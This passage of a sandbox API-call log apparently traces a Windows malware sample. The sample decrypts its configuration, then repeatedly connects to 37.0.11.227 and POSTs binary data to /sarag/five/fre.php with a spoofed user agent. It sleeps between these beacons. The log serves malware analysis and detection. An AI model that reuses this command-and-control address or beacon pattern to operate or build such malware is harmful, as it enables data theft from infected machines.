pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0196.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.626] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0196.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.628] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0196.628] GetProcessHeap () returned 0x690000 [0196.628] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0196.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.634] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0196.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.636] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0196.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.637] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0196.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.637] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0196.637] GetProcessHeap () returned 0x690000 [0196.638] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0196.638] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0196.638] GetProcessHeap () returned 0x690000 [0196.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0196.638] GetProcessHeap () returned 0x690000 [0196.639] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0196.639] GetProcessHeap () returned 0x690000 [0196.639] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0196.639] GetProcessHeap () returned 0x690000 [0196.639] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0196.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.645] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0196.650] GetProcessHeap () returned 0x690000 [0196.650] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0196.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.651] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0196.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.652] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.653] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.653] GetProcessHeap () returned 0x690000 [0196.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0196.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.654] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0196.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.655] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0196.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.656] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0196.656] GetProcessHeap () returned 0x690000 [0196.656] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0196.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.657] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0196.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.658] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0196.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.659] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0196.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.660] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0196.660] GetProcessHeap () returned 0x690000 [0196.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0196.660] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9b40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0196.660] GetProcessHeap () returned 0x690000 [0196.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0196.660] socket (af=2, type=1, protocol=6) returned 0x3f0 [0196.660] connect (s=0x3f0, name=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0196.686] FreeAddrInfoW (pAddrInfo=0x6a9b40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0196.686] GetProcessHeap () returned 0x690000 [0196.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0196.686] GetProcessHeap () returned 0x690000 [0196.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0196.687] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0196.688] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0196.721] GetProcessHeap () returned 0x690000 [0196.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0196.721] GetProcessHeap () returned 0x690000 [0196.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0196.721] GetProcessHeap () returned 0x690000 [0196.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0196.721] GetProcessHeap () returned 0x690000 [0196.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0196.722] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0196.723] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0196.723] GetProcessHeap () returned 0x690000 [0196.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0196.723] GetProcessHeap () returned 0x690000 [0196.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0196.723] send (s=0x3f0, buf=0x6abd08*, len=242, flags=0) returned 242 [0196.724] send (s=0x3f0, buf=0x6aba40*, len=159, flags=0) returned 159 [0196.724] GetProcessHeap () returned 0x690000 [0196.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0196.724] recv (in: s=0x3f0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0196.810] GetProcessHeap () returned 0x690000 [0196.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0196.811] GetProcessHeap () returned 0x690000 [0196.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0196.811] GetProcessHeap () returned 0x690000 [0196.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0196.811] GetProcessHeap () returned 0x690000 [0196.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0196.812] closesocket (s=0x3f0) returned 0 [0196.812] GetProcessHeap () returned 0x690000 [0196.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0196.812] GetProcessHeap () returned 0x690000 [0196.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0196.813] GetProcessHeap () returned 0x690000 [0196.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0196.814] GetProcessHeap () returned 0x690000 [0196.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0196.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11d4) returned 0x3f0 [0196.824] Sleep (dwMilliseconds=0xea60) [0196.826] GetProcessHeap () returned 0x690000 [0196.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0196.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.827] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.832] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0196.838] GetProcessHeap () returned 0x690000 [0196.838] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0196.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.839] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0196.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.840] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.841] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.841] GetProcessHeap () returned 0x690000 [0196.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0196.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.845] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0196.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.846] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0196.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.847] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0196.847] GetProcessHeap () returned 0x690000 [0196.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0196.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.848] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0196.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.849] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0196.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.850] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0196.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.851] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0196.851] GetProcessHeap () returned 0x690000 [0196.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0196.851] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0196.851] GetProcessHeap () returned 0x690000 [0196.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0196.851] GetProcessHeap () returned 0x690000 [0196.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0196.852] GetProcessHeap () returned 0x690000 [0196.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0196.852] GetProcessHeap () returned 0x690000 [0196.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0196.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.853] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.858] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0196.863] GetProcessHeap () returned 0x690000 [0196.863] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0196.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.864] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0196.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.864] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.865] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.865] GetProcessHeap () returned 0x690000 [0196.866] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0196.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.867] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0196.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.868] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0196.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.868] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0196.868] GetProcessHeap () returned 0x690000 [0196.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0196.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.869] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0196.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.870] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0196.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.871] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0196.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0196.872] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0196.872] GetProcessHeap () returned 0x690000 [0196.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0196.872] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9b90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0196.872] GetProcessHeap () returned 0x690000 [0196.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0196.872] socket (af=2, type=1, protocol=6) returned 0x3f4 [0196.872] connect (s=0x3f4, name=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0196.903] FreeAddrInfoW (pAddrInfo=0x6a9b90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0196.903] GetProcessHeap () returned 0x690000 [0196.903] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0196.903] GetProcessHeap () returned 0x690000 [0196.903] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0196.904] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0196.905] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0196.905] GetProcessHeap () returned 0x690000 [0196.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0196.905] GetProcessHeap () returned 0x690000 [0196.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0196.905] GetProcessHeap () returned 0x690000 [0196.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0196.905] GetProcessHeap () returned 0x690000 [0196.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0196.906] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0196.907] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0196.907] GetProcessHeap () returned 0x690000 [0196.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0196.907] GetProcessHeap () returned 0x690000 [0196.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0196.907] send (s=0x3f4, buf=0x6abd08*, len=242, flags=0) returned 242 [0196.908] send (s=0x3f4, buf=0x6aba40*, len=159, flags=0) returned 159 [0196.908] GetProcessHeap () returned 0x690000 [0196.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0196.908] recv (in: s=0x3f4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0196.983] GetProcessHeap () returned 0x690000 [0196.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0196.983] GetProcessHeap () returned 0x690000 [0196.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0196.984] GetProcessHeap () returned 0x690000 [0196.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0196.984] GetProcessHeap () returned 0x690000 [0196.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0196.985] closesocket (s=0x3f4) returned 0 [0196.985] GetProcessHeap () returned 0x690000 [0196.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0196.985] GetProcessHeap () returned 0x690000 [0196.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0196.985] GetProcessHeap () returned 0x690000 [0196.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0196.986] GetProcessHeap () returned 0x690000 [0196.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0196.987] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11d8) returned 0x3f4 [0196.988] Sleep (dwMilliseconds=0xea60) [0196.993] GetProcessHeap () returned 0x690000 [0196.993] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0196.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0196.995] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.000] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0197.006] GetProcessHeap () returned 0x690000 [0197.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0197.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.007] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0197.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.008] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.009] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.009] GetProcessHeap () returned 0x690000 [0197.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0197.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.011] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0197.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.015] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0197.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.016] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0197.016] GetProcessHeap () returned 0x690000 [0197.016] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0197.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.017] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.018] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.020] StrStrA 